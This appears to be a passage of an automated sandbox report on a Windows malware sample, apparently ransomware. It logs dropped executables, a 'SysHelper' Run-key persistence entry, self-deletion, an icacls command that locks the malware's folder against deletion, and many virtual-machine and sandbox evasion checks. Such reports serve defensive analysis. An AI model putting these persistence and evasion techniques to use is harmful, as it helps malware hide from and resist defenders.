Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED33DD push AFD66869h; ret	0_2_02ED33E2
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED45AC push D23524A7h; retn 0006h	0_2_02ED45B4
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED9D33 push 4843A5D1h; retf	0_2_02ED9D3F
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026D2 push ebx; ret	4_2_004026EA
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026ED pushad ; ret	4_2_004026F4
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004026F7 push ebx; ret	4_2_00402714
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402745 push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_0040273B push edi; ret	4_2_00402742
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_00402595 push ss; ret	4_2_0040259C
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_004027BB push edi; ret	4_2_0040276D
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E22822 push edi; ret	4_2_02E227D4

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	File created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\dejcbcc	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\dejcbcc

Jump to dropped file

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\xvm5nluelx.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\dejcbcc:Zone.Identifier read attributes | delete

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

9_2_00481920

Uses cacls to modify the permissions of files

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\dejcbcc	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: XVM5nluelx.exe, 00000000.00000002.2068735745.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, dejcbcc, 00000004.00000002.2342440036.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: dejcbcc, 00000029.00000002.3254548800.0000000002F27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKM.

Contains capabilities to detect virtual machines

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_02FC871C rdtsc

8_2_02FC871C

Contains functionality to query network adapater information

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		9_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		14_2_0040E670

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 477	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2018	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 764	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 738	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 741	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 448
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 425

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

API coverage: 4.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 2888	Thread sleep time: -201800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5520	Thread sleep time: -76400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4676	Thread sleep time: -31300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5396	Thread sleep time: -34000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\dejcbcc	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	9_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	14_2_0040FB98

Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000001E.00000002.3273089936.000000000BF44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000009
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000001E.00000003.3082332042.000000000C022000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}wC.exe=
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000b
Source: explorer.exe, 0000001E.00000002.3261048206.0000000007BE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422986001.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000797000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000655000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.0000000000655000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 33A3.exe, 00000009.00000002.2422986001.0000000000888000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\|
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}W)
Source: explorer.exe, 0000001E.00000003.3052777577.0000000007BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 0000001E.00000002.3263362552.0000000008423000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}@N
Source: explorer.exe, 0000001E.00000002.3261048206.0000000007BE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000t
Source: explorer.exe, 0000001E.00000002.3273089936.000000000BF44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\
Source: explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9507e
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000001E.00000003.3007904273.0000000008636000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 0000001E.00000003.3082332042.000000000C022000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
